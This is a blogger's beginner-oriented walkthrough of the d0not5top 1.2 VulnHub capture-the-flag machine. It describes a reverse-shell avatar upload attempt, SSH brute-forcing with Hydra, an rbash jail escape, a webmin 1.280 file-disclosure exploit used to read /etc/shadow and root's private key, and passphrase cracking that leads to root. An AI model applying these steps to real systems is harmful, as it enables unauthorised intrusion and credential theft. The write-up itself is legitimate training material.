d0not5top Write-up

d0not5top: 1.2 Write-Up by blackroomsec
Time to root: 40 days and 40 nights it felt like. 15 hours in reality over a week and a half.

Challenge URL: https://www.vulnhub.com/entry/d0not5top-12,191/
Author: 3mrgnc3
https://www.vulnhub.com/author/3mrgnc3,422/

Before I begin, all images for this challenge are at the bottom of this page. You will note that this is very long and some things perhaps are over-explained. The reason for this is my blog is geared towards the newer hacker who is still in the early stages of learning. It is at this juncture in their journey that I feel explanations such as the ones I intend to give with this site are most needed. I believe it will reduce the amount of “script kiddies” we have in the future if there are more of us who are trained in the proper stages of a pentest and the comprehension of the concepts and techniques discussed constantly in this field.

This is my goal with my research as I strive to be a competent security researcher rather than the lazy hacker I am most days.

One of the things I have noticed with other write-ups is that they assume the reader knows more than they actually might so I like to explain not only my way of thinking but why I’m using a particular command versus another (sometimes it’s just I chose that one over the other) and other things that a typical write-up will not have.

I also wish to say that I am no expert and that I also read other hacker’s write-ups to learn new techniques and clarify my understanding of certain topics.

We all had to start somewhere so please bear with me and skip over the parts you know about.

————————————
Objective
————————————

This is my second public Boot2Root, It’s intended to be a little more difficult that the last one I made. That being said, it will depend on you how hard it is 😀 It’s filled with a few little things to make the player smile.
Again there are a few “Red Herrings”, and enumeration is key.
DIFFICULTY ?????
CAPTURE THE FLAGS
There are 7 flags to collect, designed to get progressively more difficult to obtain

————————————
Tools Used
————————————

python ping sweep script from here: http://stackoverflow.com/questions/21225464/fast-ping-sweep-in-python
nmap
DirB
grep
nikto
dirb
20 cups of coffee
Frustrated battle-cries into the night
Hair-pulling
…..and everything else at my disposal. So EVERYTHING. Just everything!

————————————
Recon
————————————

Attack Box Kali Linux IP: 192.168.168.116
Victim Box D0Not5top IP: 192.168.1.149

I note the title is in LeetSpeak and keep in mind that I have a few wordlists of this kind in case they will be needed. Also, check this link out on making your own wordlists http://adeptus-mechanicus.com/codex/makdict/makdict.html

Now I want to do a ping sweep to discover our friend on the network. There’s 40 million ways to accomplish this. No way is the right way but learn as many as you can and TAKE NOTES. Your notes are your lifeblood in this business. Fping way is fast too. I like to use different tools with different challenges to change things up a bit and to keep my hacking life from getting stale. This script is fast and gives me what I need.

I save the script in a file on my desktop I call “sweeper.py”, make it executable (chmod +x) and run it.

 

 

————————————
Scanning
————————————

Next step is to port-scan it. Firing up Nmap!

 

Hooboy. So much to play with here! There are a few things which jump out at me, EXIM and DNS being one. But I want to start at the webserver and work my way back if necessary.

If you’re just learning about web applications (and I am too, we are all always learning!), allow me to recommend this book:

The Web Application Hacker’s Handbook

While there are many excellent books on the topic as well, I like this one a lot.

First thing I check always on a site is source and robots.txt and from the output this site has one.  No source here, though.

 

Looks like we may need to change our user-agent somewhere since it’s saying the terminal knows where to go. I have User-Agent Switcher on my system but you can also do it manually in the overrides of your browser.

Always learn alternate ways to do things. Minimally you should know two to three ways to accomplish the same goal so you don’t get stuck as often in the future. You should also have downloadable tools available to you versus tools which are web-based in case you don’t have web connectivity.

Always think “If I don’t have access to the Internet, how do I do this with what I have available?”

I’m not going to go to each directory manually that would take up too much time. Time to do some directory enumeration with DirB by The Dark Raver.

 

The output is ridiculously large and unusable in its current format. So now what I want to do is manipulate the file a little to show me just what I want to see. Grep to the rescue! Seriously learn this tool, collect snippets of commonly used commands you will need and store them some place safe. Pastebin and Ghostbin are filled with snippets of many different programming and scripting languages that you can research.

In this case, I want grep to show me all lines which have the words DIRECTORY and SIZE in them but ignore any lines which have “:0” since a SIZE:0 means an empty file. Then in the next command I’m going to sort the file in place and recreate it so that I have a nice sorted file of all directories I can access versus ones I can’t.

 

 

I had to snip this because it’s too long.

 

This still isn’t ideal as the author already mentioned red herrings and I know there’s going to be dead-ends because of it. I check a few and my suspicions are confirmed, empty directories mostly. Except the control directory catches my eye in addition to PHPMyAdmin.

First let’s go to the “control” directory. The page is a DNS Control Panel. No links on the page work as far as I could see.

 

I check the source of the index.html page and see Flag 1 !!!
http://192.168.1.149/control/index.html
<!– FL46_1:urh8fu3i039rfoy254sx2xtrs5wc6767w –>

A little further down in the same source code I see a message

<div class=”fluid-ratio-resize”></div>
<!– M3gusta said he hasn’t had time to get this w0rKING.
Don’t think he’s quite in the 20n3 (zone) these days since his MadBro made that 7r4n5f3r (transfer), Just Couldnt H@cxk Da D0Not5topMe.ctf –!>

What, transfer? Zone transfer, mayhaps? I know it has DNS on it from my NMAP output and the hostname so….

Now I check the JS directory and see it has directory listing enabled. I go into the README.MadBro file and it’s confirmed:

 

 

Interesting. Reference to /etc/hosts? That definitely means DNS. I write this down to change and concentrate on the next part.

The wording underneath looks like binary to me.

I convert the binary portions of it to decimal in my terminal and fill in the ASCII portions of it in between. Flag # 2!

When all finished it converts to: FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2

 

 

Now let’s open it up in our browser.

Message board. I admit I got briefly excited here and I think it was the point which is why he added it.

I create the username “admin” and password “123456” and login. There is a neat little trick we can do to upload a shell script inside an image via a user’s avatar on certain PHP message boards and since I know this I already have Pentest Monkey’s Reverse Shell hidden in a JPG and a GIF file ready for the uploading! It’s one of my favorite hacks to do.

I start a listener on my Kali Box first to catch my shell. It’s set to listen on my local port 1337 which I had to edit the code to point it to.

Now I need to see where my shell is so I can execute it. I “inspect element” on the image itself in my profile screen because if you try to view the profile you get a blank page. By inspecting it I can hopefully see the path to the image.

I see that my image is stored in the “download” directory and my dirb scan confirms there is a “download” directory from earlier.

http://d0not5topme.ctf/download/file.php?avatar=48_1495480031.gif

This does not work when I go to view the file, the shell doesn’t connect. So it’s not vulnerable to this type of attack. So, why make a message board then, if I can’t leverage it?

I don’t like things that don’t make sense. The author of this challenge didn’t go through the trouble to install this board if its existence wasn’t important or notable in some way.

I click around and somehow get this error. So now I have a username of “megusta” and a new domain. G4M35.ctf

Megusta@G4M35.ctf
I start up Live Headers and start clicking around to see if there’s anything I can see in the header info that might be a flag or a path to one.

One thing I want to say about web apps, check EVERYTHING. Source code, robots, headers, cookies, mail headers (if you interact with it in this way), everything you can get your hands on. You won’t believe the amount of things which are hidden in plain sight. Sometimes on purpose. And, especially if a hacker is the owner of the site. We love us our easter eggs!

On this board, I can’t send a private message or post or do anything but create a username and edit my profile. I logout and decide to view the headers if I start clicking buttons as a guest.

When I click the “I do not agree to those terms” button I see this

 

I thought a modified Morse code but no, it wasn’t. To check, I pasted it into my Morse Decoder app on my system. It doesn’t recognize it.

I had never seen this before. Now that I have I copy this into my hacking notes database for the future. I have all types of alternative alphabets (Sherlock’s Dancing Men, Runes, International Flag Codes, etc) for situations like this.

But in this case I have no idea so I pasted the whole thing into Google and from the results determined it was in “Brainf**k” text.

Turns out Dcode has a decoder for it. This site has served me and every other hacker who uses it well for years. Anyone that does a CTF should have this site in their notes to use.

Decoded, it is:

FL46_4:n02bv1rx5se4560984eedchjs72hsusu9

That’s flag 4.

But where’s flag 3?

Now I want to check out that SMTP server because I suspect flag 3 is there but I also know there’s an RCE sploit of EXIM rolling around out there and I want to see if it’s vulnerable. I netcat into SMTP.

Ahh, hex. Another flag, perhaps?

 

Flag # 3!

I try some commands like VRFY with that email address we were given and get Authorization prohibition errors. He’s thought of this too. No dice and no path forward here that I can see.

Moving on, I add the entry for G4M35.ctf into my /etc/hosts and scan it with Nikto.

This took me a while to go through. Lots of directories, lots of files.

In the http://g4m35.ctf/src/game.js file there’s a reference to /H3x6L64m3

And there’s a directory http://g4m35.ctf/H3x6L64m3/

When you play the game you see hex code in the background! Too frickin cool.

I can see the beginnings of a troll face but I really don’t want to play this thing through to the top to see everything. So now I go about poking around to see if I can see the images themselves

In the http://g4m35.ctf/H3x6L64m3/bkcore/hexgl/tracks/Cityscape.js file I see this which catches my attention

 

Then with further poking around I see this clue in the http://g4m35.ctf/H3x6L64m3/bkcore/threejs/Loader.js file

 

 

So I change

http://g4m35.ctf/H3x6L64m3/textures/skybox/dawnclouds/%1.jpg to
http://g4m35.ctf/H3x6L64m3/textures/skybox/dawnclouds/px.jpg

and so on

http://g4m35.ctf/H3x6L64m3/textures/skybox/dawnclouds/nz.jpg
http://g4m35.ctf/H3x6L64m3/textures/skybox/dawnclouds/pz.jpg

And now the decimals are the same in each image.

Now I convert the Decimal to ASCII

 

 

and get Flag # 5!!

FL46_5:09k87h6g4e25gh44wa1rybfi898hncdt

Now I’m stuck. I believe I’ve looked through every file there was to see. I’m missing Flags 6 & 7.

All I can really do right now is play the Missile and Hex games. Which, once again, he didn’t just upload for nothing. This took time to put together. Which means we should spend some time playing them and see what happens.

The missile game was fun but I didn’t see anything else to move forward so I tried the racing game.

As soon as it started I veered the ship off the track by sheer accident and a message flashed across the screen with a new URL

http://t3rm1n4l.ctf

So that was a good mistake! I added it to my hosts file

 

I also try to enumerate directories

 

I look through the javascript and nothing stands out to me that I can use to move forward.

Checking the source code I see the Terminal script is written by Fluid Byte

PHP+JQuery Temrinal Emulator by Fluidbyte <http://www.fluidbyte.net>

I now read the documentation and see this in it:

https://github.com/Fluidbyte/PHP-jQuery-Terminal-Emulator/blob/master/term.php

define(‘ROOT’,’/var/www’);
define(‘PASSWORD’,’terminal’);
define(‘BLOCKED’,’ssh,telnet’)

But terminal isn’t the password and you can’t view the term.php

After trying all the words in this challenge I finally tried “t3rm1n4l.ctf” and that was the proper password.

Now I begin to issue it basic Linux commands. It kept logging me out which was frustrating.

After maybe 100 different things I tried, I tried this as this is the format for the flags in this challenge.

 

grep FL4 *.*

grep: AAAAAAAAAAA: Is a directory
grep: BBBBBBBBBBB: Is a directory
grep: CCCCCCCCCCC: Is a directory
grep: M36u574.ctf: Is a directory
grep: XXXXXXXXXXX: Is a directory
grep: YYYYYYYYYYY: Is a directory
grep: ZZZZZZZZZZZ: Is a directory

And now I have a new host!

The index page has a slideshow of rapidly scrolling images. I need to see what images it is loading. I view it in Live Headers again and I was able to get the path to the one image which was different:

http://m36u574.ctf/images/kingmegusta.jpg

I thought perhaps it was a stego, so I downloaded it and used exiftool to view the metadata

My suspicions are confirmed when I see the Comment:

In the comments there was some Base64 text

 

When decoded I see it’s a hash

MeGustaKing:$6$e1.2NcUo$96SfkpUHG25LFZfA5AbJVZjtD4fs6fGetDdeSA9HRpbkDw6y5nauwMwRNPxQnydsLzQGvYOU84B2nY/O40pZ30

Let’s crack it with the infamous RockYou wordlist

 

 

————————————
Gaining Access
————————————

Logged in I see all this.

I see another Base 64 string

 

converts to

 

 

pulled out of that and also decoded Base64 converts to

FL46_6:pqpd2jfn4ruq1obyv3thw848te67tejey

So we’ve got Flag #6!

There’s a message that we’re in the “rush” shell and that we are not “burtieo” which I’m assuming is a username. I have no other passwords so I’m going to use Hydra to attack the SSH server, supplying it with the username “burtieo” and the rockyou wordlist again since the last user it said was Rockyou. I also went to sleep because I knew this would take a while.

An hour and a half later, it had it. But I didn’t see this until the following morning.

I also have a restricted shell. LOL Because OF COURSE I have a restricted shell to deal with now!

Jail escapes are a lot of fun. In learning the variety of ways they can be done, you also get to learn why they are possible. I have provided a bunch of links at the bottom so you can research these different techniques and which shells they are possible on, at the bottom of this page.

The first step when encountering one is to determine what you CAN and CAN’T do and what kind of environment you’re working with. This starts with asking the restricted shell for help.

Three things things catch my eye “compgen”, “declare” and “export”. I recently read a write-up by a hacker who did a similar rbash jail escape during this year’s Boston Key Party which I had planned on doing (even signed up for it!) but got stuck dealing with ADULTING and was pissed I missed it.

This is that article.

https://losfuzzys.github.io/writeup/2017/02/27/bkpctf2017-solitary-confinement/

We’ll get to declare in a moment. The idea at this stage with a restriction is to continue seeing what you can’t see and do. So you can focus on what you CAN see and do. The problem is you are limited in HOW you can see and do them.

As a hacker it’s your job to get around these obstacles by manipulating what you can do and sometimes leveraging a vulnerability present in what you can’t do which allows you to do it because it’s not configured properly.

As for compgen, I know I can use it to list directories, files and what commands are available to me. Which I need because I have no idea what files are present in the system at this point and I need an entry-point, specifically, a world-writable directory if I can find one.

Since with this shell I cannot LS, I have no choice but to look for alternatives.

burtieo@D0Not5top:~$ ls
-rbash: ls: command not found

compgen -c will tell me what commands are available on the system outside this particular restricted environment (this is snipped)

 

suedoh? What’s THAT? I make a note to come back to it.

I now need to confirm where where these commands are stored in the system so I can access them.

I am NOT assuming they are in the usual places they should be because we’re dealing with a hacker who has considerable skill here, so he could’ve done anything.

Since this shell also doesn’t let me see filenames because cat doesn’t work, how can I leverage compgen to show me filenames? Easy! With the -f switch!

These are snipped.

 

Now that I know where LS and other commands I might use are stored.

 

Want to see directories? Supply it with the -d switch! And as you see with this command you can use the / character whereas in the restricted shell if you try, it gives you a restricted error. 🙂

burtieo@D0Not5top:~$ compgen -d /etc/

 

So now the next time you’re in a restricted shell and you can’t LS, but you can use compgen, you’ll know how to view files and directories.

I’m demonstrating this because this particular challenge provides an excellent opportunity to showcase different ways to accomplish the same goal. Before I continue, I do realize there are a few ways to escape this VM’s shell. However, even though I’m aware of the other ways, I specifically didn’t do them that way because then I don’t advance my skills and broaden my knowledge of attack vectors I know how to do.

To learn more about compgen read this: http://www.serverwatch.com/server-tutorials/a-look-at-the-compgen-bash-builtin.html

and this https://www.gnu.org/software/bash/manual/bash.html#Programmable-Completion-Builtins

Now let’s get the hell out of this jail.

Let’s go back to the write-up I read from the other hacker faced with the same rbash environment.

If we first use declare we can manipulate the PATH and get all the commands we need in the directories we specify in the PATH command. We then use export to run it. Followed by bash to get out of the shell and now we are unrestricted.

 

 

 

 

————————————
PrivEsc
————————————

At this stage, we now want to escalate our privileges from “burtieo” to root or another user that has more privileges than we have.

I spent some time manually looking for world-writable directories and the like and then decided to upload the LinEnum.sh script found here to do my dirty work for me.

I have this script already on my Kali Box but I don’t always like to rely on automated scripts because then I don’t learn and it’s fun to type the commands yourself.

In this case, because he’s put shit EVERYWHERE, I am not going to lose two months of my life trying to find them. I need help.

Since I have unrestricted access I first check to see if the /tmp directory is writable and executable for burtieo.

I need a place to run my LinEnum script.

 

I can write to it. Can I execute?

 

No VIM. Vi?

 

 

Yes, I can!

Now let’s use SCP to transfer the file from my Kali Box to my victim.  You can also use netcat or anything else available to you. SCP to me, if available, is faster and easier.

 

********Please note that if you’re running as root on Kali you need to allow root access to SSH in your sshd_config file and start the service if it’s not already running*********
burtieo@D0Not5top:/tmp$ scp root@192.168.1.116:enum.sh /tmp/
root@192.168.1.116’s password:
enum.sh 100% 42KB 42.3KB/s 00:00

burtieo@D0Not5top:/tmp$ ls
blackroomsectest
enum.sh
systemd-private-80074acc235b4afa9865b94dffde935f-pdns.service-HlkmX2

burtieo@D0Not5top:/tmp$ chmod +x enum.sh

 

This is snipped

 

Oh wow! We can run commands as root without its password! And we have an executable file that we can run!

It counts down from 20 and asks if we caught 10kilo?

On my desk I have a literature holder with all of my cheatsheets. The first one I have is a list of common ports. 10000 is webmin.

I try to connect to it via Firefox and it gives me a weak server key.

There is a slightly lengthy workaround circulating which explains how to fix this that I’m not doing because I’m doing this challenge on my production Kali box and I don’t want to be playing around with SSL certs and the like.   Because SEKURITY!

So?

I download Firefox version 29.01 which I know I can bypass this restriction and fire it up.

I can now see the webmin interface. Problem is? I don’t have a password. I know the default username is admin but after trying a few things, my laziness kicks in and I decide I don’t want to keep getting cramps in my fingers typing into oblivion.

So now I’m driven to get the /etc/shadow file so I can get the root hash.

I look up the version of webmin on the system

burtieo@D0Not5top:/etc/webmin$ cat version
1.280
burtieo@D0Not5top:/etc/webmin$

I immediately search for an RCE, PrivEsc or Arb File Disclosure sploit and find the latter.

Perfect! There’s two.

One using CURL and PHP and the other using PERL.

https://www.exploit-db.com/exploits/1997/

I try the CURL one but it errors out which tells me something on my system is missing or not configured.

I don’t want to play tech support for ten more hours when I’m THIS close to root.

I look at the PERL one. https://www.exploit-db.com/exploits/2017/

There’s a note which says I have to have LWP which I do. Okay good!

So here’s the setup:

On the SSH session logged in as burtieo I start the “wmstrt” process. I have a 20 second window of opportunity.

On my Kali box I copy the exploit code into a file called “webmin.pl”, make it executable and run it on my local Kali terminal.

It runs but errors out saying “certificate verify failed” which is the same problem Firefox’s later versions are having.

So I have to play tech support after all.

Side note: As a hacker you’re going to do a LOT of tinkering with scripts in order to get ahead.

I now look up how to make PERL ignore the cert.

https://stackoverflow.com/questions/17756776/perl-lwp-ssl-verify-hostname-setting-to-0-is-not-working

I add the following two lines to the top of the exploit:

$ENV{PERL_NET_HTTPS_SSL_SOCKET_CLASS} = ‘Net::SSL’;
$ENV{‘PERL_LWP_SSL_VERIFY_HOSTNAME’} = 0;

I then re-execute the process as burtieo and re-execute my script and do I have the /etc/shadow file???????????????

————————————
Path to Root
————————————

SILLY RABBIT TRIX ARE FOR KIDS! Of course I do!

To get this to work you have to specify “1” for HTTPS which the remote host is using and because it is using a 1028bit key, which Firefox deems as “weak”, this is the cause of the SSL cert problem.

With this exploit we can read any file as root. We can’t write or execute any file as root though.

 

 

 

Now I need to crack the root password in order to get in as root.

Same thing, crack it with RockYou using JtR. Except, JtR *and* Hashcat suddenly weren’t working on my system.

I’ve been breaking things of late (namely NMAP and Metasploit to name just two) so I want to see if I can get in another way without his password.

In fact I am PRAYING I can because if I can’t, I’m screwed and can’t finish this challenge! I can’t assume though. I need to know for sure.

If I can’t then I have to figure out why JtR and hashcat are broken and my life is going to be nine kinds of SUCK. Eventually I’ll fix them, just not right now.

I want to see the sshd_config file to see if I can actually login as root over SSH. If I can’t, cracking his password is pointless since I can’t use it anyway.

The only other way in is to use his RSA key.

Can I read it and see what I’m dealing with, though?

 

 

I was right, but guess what?!

 

YEAH BOY! I don’t need his password! We can use his RSA key to login to SSH!

How do we get his RSA key?

Using the webmin exploit again except this time we’ll grab that!

 

 

But, it’s encrypted, which means we need to find out the passphrase first in order to decrypt it.

Before we can crack the passphrase, we have to get the hash from it.

(I re-installed JtR and got it working for the remainder of this challenge. It was erroring out on SHA512 – Hashcat still broken though. )

 

 

Now we crack the passphrase in the hash

 

Using OpenSSL’s feature to convert the key we supply it with the passphrase

 

 

And now we using our Kali Box’s terminal we supply SSH with the ‘-i’ switch and login to the remote as root 🙂

 

Am I root?! YOU BET YOUR SWEET ASS I’M ROOT.

 

 

Now to get the last flag. Let’s see what we can see.

 

 

Looks like it’s trying to create a socket? I’m so tired at this point that I just decode the shellcode to get the last flag.

 

 

All decoded the last flag is FL46_7:9tjt86evvcywuuf774hr88eui3nus8dlk

and a final message from the author to never assume! Ha! I said that earlier, didn’t I?

————————————
Flags
————————————

FL46_1:urh8fu3i039rfoy254sx2xtrs5wc6767w

FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2

FL46_3:29dryf67uheht2r1dd4qppuey474svxya

FL46_4:n02bv1rx5se4560984eedchjs72hsusu9

FL46_5:09k87h6g4e25gh44wa1rybfi898hncdt

FL46_6:pqpd2jfn4ruq1obyv3thw848te67tejey

FL46_7:9tjt86evvcywuuf774hr88eui3nus8dlk

————————————
Conclusion – Special Remarks
————————————

This was a Pyhrric victory for me yet strangely gratifying to do. For some reason I spent more time getting to know this particular challenge than any other. There is brilliance in this and I appreciate genius when I see it. Hat’s off to 3mrgnc3 for creating this.

I always say, the joy of what we do is in the discovery, the learning new techniques and going out of our comfort zone to broaden our horizons. I look forward to the author’s next entry in the boot2root world.

I have no idea what the User-Agent GameTerminal was about. If someone knows please DM me on Twitter.

Also, what was up with the socket?

There are three other hidden games on this box.

http://g4m35.ctf/arena5/
http://g4m35.ctf/AsteroidsReloaded/
http://g4m35.ctf/candyrunner/

He created another version of sudo called “suedoh” but I didn’t use it.

————————————
Challenge Images
————————————

 

 

 

————————————
Resources
————————————

https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells

https://netsec.ws/?p=337

Read these to understand a bit more about RSA and SSH and why I was able to login as root without the password
https://stackoverflow.com/questions/2821736/whats-the-difference-between-id-rsa-pub-and-id-dsa-pu